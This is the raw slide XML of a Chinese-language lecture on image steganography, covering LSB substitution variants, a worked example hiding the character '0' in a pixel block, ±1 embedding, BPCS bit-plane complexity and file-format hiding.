              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>比特</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作为整体，依次用秘密信息替换，这种算法称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>TMLSB(Truss MLSB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254099656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已知某灰度图像，像素值用</a:t>
                </a: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比特表示，局部区域像素矩阵如下：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dirty="0" smtClean="0"/>
                  <a:t>请问：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若要隐藏字符</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>‘0’</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t> ASCII</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>码</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>0x30</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>），应该如何修改这些像素？（要求待隐藏的信息按列优先排列，先替换最低比特平面，再替换次低比特平面）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若约定像素位置扰乱方式为转置，要求先扰乱，再隐藏，则收发双方应该如何处理？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1" t="-1926" b="-1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71279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4385" y="1444625"/>
                <a:ext cx="8504113" cy="4601245"/>
              </a:xfrm>
            </p:spPr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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>：无扰乱方式处理步骤为：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第一：将字符转为比特串，并按像素矩阵尺寸排列：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’0’-&gt;X(30)-&gt;B(0011 0000)-〉</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>按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列优先</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>排列</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>-〉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第二：按位权低高展开像素矩阵</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>	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i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>：</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>最低位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比特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平面</a:t>
                </a:r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385" y="1444625"/>
                <a:ext cx="8504113" cy="4601245"/>
              </a:xfrm>
              <a:blipFill rotWithShape="1">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-573" t="-1722" b="-4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243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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>：无扰乱方式处理步骤为：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第三：用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替换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替换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，得到：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即隐藏前，像素为：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，隐藏后：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001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51" t="-1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67184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课程内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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格式信息隐藏算法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时域算法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变换域算法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扩频算法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统计算法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1091246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解：无扰乱方式处理步骤为：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第四：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接收方</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>拿到含秘密信息的图像块后：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m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/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提取最低和次低比特平面：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dirty="0" smtClean="0"/>
                  <a:t>按列优先排列，得到：</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="2"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
                  <a:t>B(00110000)-&gt;X(30)-&gt;’0’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1" t="-1926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27991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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>：扰乱方式为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转置</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>时，处理步骤为：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第一：仍然将字符转为比特串，并按像素矩阵尺寸排列：</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="2"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>’0’-&gt;X(30)-&gt;B(0011 0000)-〉 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>按</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>列</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>优先限排列</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>-〉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1" t="-1926" r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5969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7213"/>
                <a:ext cx="8579296" cy="4114800"/>
              </a:xfrm>
            </p:spPr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</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>：扰乱方式为转置时，处理步骤为：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第二：嵌入前，先扰乱像素得到：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再按位权低高展开像素矩阵</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>	(9,11,12,13)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011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7213"/>
                <a:ext cx="8579296" cy="4114800"/>
              </a:xfrm>
              <a:blipFill rotWithShape="0">
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-640" t="-1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3545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解：扰乱方式为转置时，处理步骤为：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第三：用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替换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替换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，得到：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即隐藏后：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恢复原始排列顺序：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1" t="-1926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18817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IMLSB</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>算法案例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解：扰乱方式为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转置</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>时，处理步骤为：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第四：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接收方</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>拿到含秘密信息的图像块后，首先按约定好的方使扰乱图像块：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1101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提取最低和次低比特平面：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dirty="0" smtClean="0"/>
                  <a:t>按列优先排列，得到：</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr lvl="2"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
                  <a:t>B(00110000)-&gt;X(30)-&gt;’0’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926" r="-1001" b="-15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53665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LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>改进算法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LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>算法通过替换像素比特为秘密信息实现隐藏，会影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>载体的统计特性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改进思路是，修改像素时，无论像素值是奇数还是偶数，都可以对其加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或减</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来实现隐藏。基于该思路的算法称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>±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隐藏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828522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LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>改进算法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一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>±</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐藏算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设秘密信息位为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，对应隐藏该位的像素灰度值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>x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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>x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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的最低比特位相同，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>x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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) mod 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，那么不改变原始数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>x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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的最低比特位不同，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SymbolMT" charset="-122"/>
              </a:rPr>
              <a:t>≠ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0"/>
              <a:t>x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j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) mod 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时，计算</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN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184799"/>
            <a:ext cx="41910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36306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LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>改进算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>±</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隐藏算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:latin typeface="TimesNewRomanPS-ItalicMT" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="TimesNewRomanPSMT" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0" err="1">
                <a:latin typeface="TimesNewRomanPS-ItalicMT" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="TimesNewRomanPSMT" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:latin typeface="TimesNewRomanPS-ItalicMT" charset="0"/>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="TimesNewRomanPSMT" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>作如下调整</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN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284984"/>
            <a:ext cx="6324600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43806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LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>算法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>算法可应用于彩色图像。典型方法为：依次在彩色图像的各个颜色通道，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>LSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>算法嵌入信息。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411688" y="3340493"/>
            <a:ext cx="5339308" cy="3256859"/>
            <a:chOff x="1104900" y="1752600"/>
            <a:chExt cx="7848600" cy="4573588"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38917" name="Group 2063"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1104900" y="1752600"/>
              <a:ext cx="7302500" cy="4573588"/>
              <a:chOff x="680" y="1151"/>
              <a:chExt cx="4600" cy="2881"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38919" name="Picture 2064" descr="B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5" y="1151"/>
                <a:ext cx="2623" cy="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20" name="Picture 2065" descr="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0" y="1296"/>
                <a:ext cx="2623" cy="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21" name="Picture 2066" descr="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488"/>
                <a:ext cx="2623" cy="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22" name="Picture 2067" descr="原图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" y="1772"/>
                <a:ext cx="2627" cy="2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23" name="AutoShape 2068"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3792" y="3792"/>
                <a:ext cx="672" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="borderCallout2">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 30000"/>
                  <a:gd name="adj2" fmla="val -7144"/>
                  <a:gd name="adj3" fmla="val 30000"/>
                  <a:gd name="adj4" fmla="val -30060"/>
                  <a:gd name="adj5" fmla="val -31250"/>
                  <a:gd name="adj6" fmla="val -48361"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="22225">
                <a:solidFill>
                  <a:srgbClr val="00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zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                    <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>红色通道</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38924" name="AutoShape 2069"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4608" y="3552"/>
                <a:ext cx="672" cy="240"/>
              </a:xfrm>
              <a:prstGeom prst="borderCallout2">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 30000"/>
                  <a:gd name="adj2" fmla="val -7144"/>
                  <a:gd name="adj3" fmla="val 30000"/>
                  <a:gd name="adj4" fmla="val -37944"/>
                  <a:gd name="adj5" fmla="val -51250"/>
                  <a:gd name="adj6" fmla="val -62648"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="339966"/>
              </a:solidFill>
              <a:ln w="22225">
                <a:solidFill>
                  <a:srgbClr val="00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zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                    <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>绿色通道</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38918" name="AutoShape 2070"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7886700" y="5114925"/>
              <a:ext cx="1066800" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout2">
              <a:avLst>
                <a:gd name="adj1" fmla="val 30000"/>
                <a:gd name="adj2" fmla="val -7144"/>
                <a:gd name="adj3" fmla="val 30000"/>
                <a:gd name="adj4" fmla="val -48810"/>
                <a:gd name="adj5" fmla="val -72500"/>
                <a:gd name="adj6" fmla="val -65181"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0000FF"/>
            </a:solidFill>
            <a:ln w="22225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1600" b="1">
                  <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>蓝色通道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99405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BPCS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bit-plane complexity segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）位平面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>复杂度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分割</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原理：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将载体数据的多个位平面分成小块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>人的视觉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对变化剧烈、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>复杂度较高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的位平面小块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不敏感</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>秘密信息可以加载在多个位平面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331640" y="5085184"/>
          <a:ext cx="1751856" cy="1643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5928"/>
                <a:gridCol w="875928"/>
              </a:tblGrid>
              <a:tr h="54794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+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>样点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47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47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779912" y="5085184"/>
          <a:ext cx="2088232" cy="1643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54794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+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>第</a:t>
                      </a:r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2400" dirty="0" smtClean="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>比特平面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47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47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444208" y="5085184"/>
          <a:ext cx="2088232" cy="1643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54794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+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>第</a:t>
                      </a:r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400" dirty="0" smtClean="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>比特平面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47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479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10067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文件格式信息隐藏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</a:rPr>
              <a:t>图像文件都有一定的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存贮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>格式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文件头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>主要描述图像文件的格式、文件大小、数据起始偏移地址、图像数据大小等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>关键信息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</a:rPr>
              <a:t>利用图像文件的这种特性，可以在图像文件中隐藏秘密数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204794929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03648" y="1981200"/>
            <a:ext cx="7626350" cy="48768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BPCS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复杂度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>复杂度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相邻像素对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>取值不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的像素对数目。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复杂度最大可能值记为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Cmax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8×8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，复杂度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
